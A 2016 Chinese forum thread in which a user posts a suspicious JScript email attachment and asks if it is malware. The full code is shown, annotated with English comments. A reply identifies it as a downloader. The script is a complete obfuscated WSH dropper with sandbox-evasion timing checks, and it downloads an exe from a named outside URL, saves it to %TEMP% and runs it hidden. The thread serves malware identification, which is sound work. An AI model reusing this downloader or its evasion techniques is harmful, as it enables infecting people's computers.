bujie8010 发表于 2016-3-29 22:09:04

高手帮忙看看下面这个JS文件的内容是不是病毒?

我的邮箱收到的一个*.js的文件,同时还有一个VCW.x的文件,担心是病毒,放上来大家看看。

// Global setup of a WSH/JScript downloader (runs under wscript.exe/cscript.exe, not a browser).
// Several of these globals are decoys that are never read: Wguoqb and Ujyncrq are unused,
// and Drajvc is only returned by Vpwqiwx(), which nothing calls.
var Njjebnuzmw = false; // gate flag; flipped to true only by the @cc_on block further down
var Drajvc = "CreateObject";
// WScript(...) invokes the WScript host object's default method, which here behaves as
// CreateObject — so this IIFE yields a WScript.Shell instance, later used for
// ExpandEnvironmentStrings() and Run().
var Xjaqx = function Iuxll() {return WScript("WScript.Shell");}();
var Wguoqb = 123213;
var Lvkavnlx = "MSXML2.XMLHTTP"; // ProgID of the HTTP client object created later via Yavxqo()
var Ujyncrq = 2123213;
var Aetzlpvn = 0; // reused everywhere a literal 0 is needed (loop start, Run() flags, stream position)
// Executes a command through WScript.Shell.Run(cmd, intWindowStyle=0, bWaitOnReturn=0):
// window style 0 means the launched process gets a hidden window, and 0 for wait means the
// script does not block on it. Called last with the path of the downloaded executable.
function Hxwsaenrc(Vjctgfyrm){Xjaqx["Run"](Vjctgfyrm, Aetzlpvn, Aetzlpvn);};
// Indirection that just returns the "MSXML2.XMLHTTP" ProgID string (obfuscation only).
function Yavxqo(){return Lvkavnlx;};
// Plain subtraction, wrapped to obscure the millisecond arithmetic in the timing probe Qanam().
function Npfjsn(Pnqjpfm, Pmqmjhqx){return Pnqjpfm - Pmqmjhqx;};
// Returns the string "CreateObject". Never called anywhere in this sample — dead decoy code.
function Vpwqiwx(){return Drajvc;};
// JScript conditional compilation. To any standards JS engine (browser, Node) this is an
// ordinary comment, so the gate stays false and nothing below executes; under the Windows
// Script Host, @cc_on enables it and @_win32/@_win64 are true, which arms the payload.
// This is a common trick to make a sample look inert outside its intended host.
/*@cc_on
@if (@_win32 || @_win64)
    Njjebnuzmw = true;
@end
@*/
// Windows-only branch: download an executable over HTTP, write it to %TEMP%, and run it hidden.
// Indicators visible in this sample: the URL on the open() line and the dropped file name
// returned by Nneeuvrwkd(). Note the assignments without `var` below (Zjrxmcvrq, Iqvjsptncx,
// Sezqmummew, Metytqs, Rruryo) create implicit globals.
if (Njjebnuzmw)
{
// Set to "open" later but never read — a decoy, like Rruryo = "Sleep" further down.
var Rknmqp = "";
// Constant 22: serves as the Sleep() interval in ms and as the retry bound of the probe loop.
function Btgig(){return 22;};
// Outer counters. Qanam() re-declares both with `var`, so these outer copies stay 0.
var Sgfezd = 0; var Lzjfcra = 0;
// Timing probe: reads the clock around two short Sleep() calls and returns
// (delta1 - delta2) in milliseconds. Only a non-zero result arms the download below, so an
// environment where Sleep()/Date do not advance in a realistic way never reaches the payload —
// this looks like an anti-emulation / sandbox-evasion check (inferred from usage).
function Qanam()
{
var Kxuyqazf = new this["Date"]();
var Jzqjwao = Kxuyqazf["getUTCMilliseconds"]();
WScript["Sleep"](Btgig());
var Kxuyqazf = new this["Date"]();
var Ufpguwp = Kxuyqazf["getUTCMilliseconds"]();
WScript["Sleep"](Btgig());
var Kxuyqazf = new this["Date"]();
var Dyvdad = Kxuyqazf["getUTCMilliseconds"]();
// The string initialisers are immediately overwritten — noise for signature matching.
var Sgfezd = "Gjtpzoz";
Sgfezd = Npfjsn(Ufpguwp, Jzqjwao);
var Lzjfcra = "Bxmlwd";
Lzjfcra = Npfjsn(Dyvdad, Ufpguwp);
Rknmqp = "open";
return Npfjsn(Sgfezd, Lzjfcra);
}
var Ixkwaxcqiv = false;
var Apygzghdxr = false;
// Up to 22 attempts; the first non-zero probe result sets both flags and exits.
// The string concatenation into Lzjfcra is never read again.
for (var Cqwwsl = Aetzlpvn; Cqwwsl < Btgig() * 1; Cqwwsl++){if (Qanam() != Aetzlpvn){
Ixkwaxcqiv = true;
Lzjfcra = "31" + 11 * Sgfezd + Lzjfcra;
Apygzghdxr = true;
break;
}}
// 1 when both flags are true, else 0 — a redundant re-check of the same condition.
function Qkrgq() {return ((Ixkwaxcqiv == true) && (Ixkwaxcqiv == Apygzghdxr)) ? 1 : Aetzlpvn;};
if (Ixkwaxcqiv && Qkrgq() && Apygzghdxr){
// Drop path: %TEMP% expanded via WScript.Shell plus a fixed executable name (an indicator).
function Nneeuvrwkd() {return Xjaqx["ExpandEnvironmentStrings"]("%TEMP%/") + "xx87Vzpdlz80Dn.exe";};
// Create the MSXML2.XMLHTTP client (again via the host object's default method).
Zjrxmcvrq = Yavxqo();
Iqvjsptncx = WScript(Zjrxmcvrq);
// Retry loop: any exception (no network, DNS failure, HTTP error) is swallowed by the empty
// catch and the request is simply repeated — it spins until a download succeeds.
var Gchpvr = 1;
while (Gchpvr){
try {
// Calling the COM object directly invokes its default member; with these arguments it acts
// as open("GET", url, async=false). The URL is the download source indicator.
Iqvjsptncx("GET", "http://yorkshirecyclecompany.com/di8ols", false);
Iqvjsptncx["send"]();
Rruryo = "Sleep";
// Poll until readyState reaches 4 (complete); WScript(242) presumably acts as a ~242 ms pause.
do {WScript(Btgig() * 11)} while (Iqvjsptncx["readystate"] < 2 * 2);
Gchpvr = Aetzlpvn;
} catch(Sinxxid){};
}
// Identity function: the comma operator discards 1..5 and yields the argument.
function Ofjhjo(Ekpgoo) {var Ihcbuu = (1, 2, 3, 4, 5, Ekpgoo); return Ihcbuu;};
// ADODB.Stream, referenced under two names (Sezqmummew and Zjrxmcvrq are the same object):
// open the stream, set type 1 (binary), write the HTTP response body, rewind to 0,
// SaveToFile(path, 2) (2 = create/overwrite), then close.
Sezqmummew = WScript("ADODB.Stream");
Zjrxmcvrq = Sezqmummew;
Zjrxmcvrq();
Zjrxmcvrq["type"] = Ofjhjo(1);
Zjrxmcvrq["write"](Iqvjsptncx["ResponseBody"]);
Sezqmummew["position"] = Ofjhjo(Aetzlpvn);
// "Save" + "ToFile" / "c"+"lose": method names split to defeat simple string matching.
Zjrxmcvrq["Save" + "ToFile"](Nneeuvrwkd(), 2);
Sezqmummew["c"+"lose"]();
// Finally execute the dropped file hidden and without waiting (see Hxwsaenrc).
Metytqs = Nneeuvrwkd();
Hxwsaenrc(Metytqs);
}
}

dawanpi 发表于 2016-3-30 16:06:33

虚拟机运行下,去%TEMP%目录找那个xx87Vzpdlz80Dn.exe看看是不是病毒好了。
这种混淆后的js可读性很差,大致看了下,像是从yorkshirecyclecompany.com下载个exe文件保存在用户临时目录然后运行,从行为上看不像是什么好东西。